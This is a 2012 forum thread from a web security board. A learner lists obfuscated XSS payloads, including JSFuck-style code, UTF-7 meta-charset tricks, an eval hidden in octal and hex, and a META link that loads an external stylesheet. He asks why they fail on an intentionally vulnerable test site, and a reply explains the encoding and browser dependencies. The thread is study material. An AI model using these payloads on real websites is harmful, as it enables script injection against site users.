Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
How to use these XSS jnection vectors?
Posted by: rickm
Date: November 07, 2012 05:23AM

Hi all

I'm dedicated in learn XSS, I understand the basic and I'm learning everyday more and more - thanks to this great forum and all you guys.

Most of my tests are with FireFox 16.0.2 and this vulnerable test site (it's a site created intentionally to be vulnerable and test web issues):

http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script>

However, if you prefer any other to give me an working example not problem. :)

During these days I have collected a set of XSS payloads that are very interesting, however I'm unable to reproduce them and make the so wanted alert box appear. Can you please take a look at them and let me know why they are not working on my target test site?

Case #01:

/./iiin({}) // Chrome only

Ref.: http://sla.ckers.org/forum/read.php?2,29090,page=12

I tested with last version of Chrome and it doesn't work. Is it really possible to generate an alert box? Or is it just an test that do not produce anything useful?

Case #02:

“<META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css&gt;; REL=stylesheet”>”

Ref.: http://www.thespanner.co.uk/2007/10/01/xss-attacks-a-practical-example/

I tested with last version of Chrome and my Firefox and it doesn't work. Can someone point me what's wrong? Also, is there an special way to encode it to make it work?

I tried it like these without success:

http://demo.testfire.net/search.aspx?txtSearch=“<META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css&gt;; REL=stylesheet”>”

http://demo.testfire.net/search.aspx?txtSearch=“><META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css&gt;; REL=stylesheet”>”

http://demo.testfire.net/search.aspx?txtSearch=%E2%80%9C%3CMETA%20HTTP-EQUIV%3D%C3%A2%E2%82%AC%C2%9DLink%C3%A2%E2%82%AC%C2%9D%20Content%3D%C3%A2%E2%82%AC%C2%9D%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%26gt%3B%3B%20REL%3Dstylesheet%C3%A2%E2%82%AC%C2%9D%3E%E2%80%9D

Case #03:

I have seen many of these crazy payloads:

([],[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])()[([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+[])]+(![]+[])[+!![]+!![]]]('alert(1)')

OR

+[+[+[]==+[]][+[]]+[[[]+[][+[]]][+[]][+[+[]==+[]][+[]]+[+[]==+[]][+[]]+[+[]==+[]][+[]]]+[]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]]]

However it doesn't work - I'm pretty sure that I'm missing something to make it works. I tested on last version of Chrome and Firefox on the test site with encoding, adding <script> tag, etc and nothing. Can soneome please give me an working example? I guess should be a generic way to test it such as we do with <script>alert(1)</script>, right?

Case #04:

Another very weird XSS payload, never worked in my tests with the environment previouus described.

<@uni>b=<@/uni>/\u/<@uni>[-1]<@/uni><@uni>z=<@/uni>/00/<@uni>[-1]<@/uni><@uni>c=<@/uni>/c/<@uni>[-1]<@/uni><@uni>e=0[<@/uni>'<@hex>ev<@/hex><@oct>al<@/oct>'<@uni>](<@/uni>'<@oct>b+z+61+b+z+6+c+b+z+65+b+z+72+b+z+74+b+z+28+b+z+31+b+z+29<@/oct>'<@uni>)<@/uni><@uni>0[<@/uni>'<@oct>ev<@/oct><@hex>al<@/hex>'<@uni>](e)<@/uni>

Is is real? Someone got it working? How? Can you please give me an example?

Case #05:

These payloads where you are in theory able to change the conten-type and define it as UTF-7 and inject this payloads with unicode or even non-alpha. Some payloads that I found use <head> before meta tag, however, none of them work. I tried URL-encode, inject <script> tag before, etc. I think they are very, very specific or I'm missing something.

<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">'\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029'.replace(/\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)</head>

<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">2BIBoAxAPAACU-tag+style%2BAD0AIg-xss%3Aexpression%28alert%286%29%29%2BACI-+%2BIBoAxCIr-

Can you please give a working example?

Case #06: - OK, I promise, this is the last one :-)

This one use some kind of strange charset, never worked here as well. I have no idea about how to encode it because with URL-encode it doesn't work to produce a alter box.

“¼script¾alert(¢XSS¢)¼/script¾â€

As I told on the beginning, please, feel free to test all of them on the test website (http://demo.testfire.net/search.aspx?txtSearch=InjectHere) and please, let me know if you were able to reproduce any of them. Also, if you prefer to use any other test site no problem. Maybe is there any requirement on the vulnerable script that is not present in this test site?

As you see I'm very curious about this strange and weird XSS, I would love to see them working, but I was unable myself, so I'm asking your help sla.ckers masters.

Thanks.

Options: ReplyQuote
Re: How to use these XSS jnection vectors?
Posted by: Albino
Date: November 08, 2012 02:35PM

First of all to gain a solid understanding of XSS I recommend http://lcamtuf.coredump.cx/tangled/ . I think that will help more than disconnected examples. But, since you asked, I'll try to answer from memory:

Case #01:
Look at the first page of the thread; this is a bypass of Gareth's JSReg sandbox. http://sla.ckers.org/forum/read.php?2,29090,page=1

Case #02 and #05 and #06:
These all require unusual encodings. As you notice, <meta> tags can be used to define encodings. However, encodings are normally defined in the HTTP response headers - use an intercepting proxy like Burp to see these. Headers generally take precedence over HTML, so a <meta encoding tag may be overridden by a header.

I'm not the right person to answer #03 and #04.

Many of the weirder vectors you see here will rely on browser peculiarities, which may change at any time.

For a maintained list of practically useful vectors, see http://html5sec.org/

Also relevant is http://shazzer.co.uk/home . The first tests created at the bottom of the list on http://shazzer.co.uk/vectors are particularly interesting.

-------------------------------------------------------
Research blog

Options: ReplyQuote
Re: How to use these XSS jnection vectors?
Posted by: rickm
Date: November 14, 2012 04:18AM

Hi Albino

Thanks for your answer, very appreciated.

I will take a closer look at this book that you are referencing.

This http://html5sec.org/ is nice.

The other site (http://shazzer.co.uk/vectors) provides a lot of examples, but most of them do not looks that exotic like the ones that I referenced. IF you know other sites with a list of exotic XSS, please, let me know.

Thanks.

Options: ReplyQuote
Re: How to use these XSS jnection vectors?
Posted by: Albino
Date: November 24, 2012 06:01AM

Take a closer look at shazzer - most of the vectors have a single exotic character. By chaining together a few different ones you could create something pretty interesting.

https://twitter.com/XSSVector has some good tricks too.

-------------------------------------------------------
Research blog

Options: ReplyQuote


Sorry, only registered users may post in this forum.